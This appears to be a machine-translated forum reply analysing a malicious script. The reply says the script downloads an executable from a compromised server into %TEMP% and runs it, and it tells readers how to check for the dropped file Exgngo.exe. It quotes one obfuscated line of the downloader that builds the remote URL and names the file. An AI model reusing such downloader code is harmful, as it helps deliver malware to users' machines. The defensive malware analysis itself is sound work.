Im Grunde, was es tut, ist eine ausführbare Datei von einem kompromittierten Server in Ihr temporäres Verzeichnis herunterladen und es läuft. Ich habe die Datei nicht weiter untersucht.

Da Sie keine Fenster verwenden, ist dies harmlos. Wenn Sie das täten, wäre der erste Schritt, zu überprüfen, ob sich eine Datei mit dem Namen Exgngo.exe (diese Zeile enthält den relevanten Namen: yakamurahirobetobeVIUVIUVIU_a2("http://"+yakamurahirobetobeVIUVIUVIU_a5[yakamurahirobetobeVIUVIUVIUuueee].yakamurahirobetobeVIUVIUVIUtttoooo() + "?bPxXNr=LUmUhmmq","Exgngo");) in Ihrem Verzeichnis %TEMP% befindet. Wenn dies der Fall ist, wenden Sie sich an jemanden, der weiß, was er tut, um damit fertig zu werden.

EDIT: Virus Insgesamt here.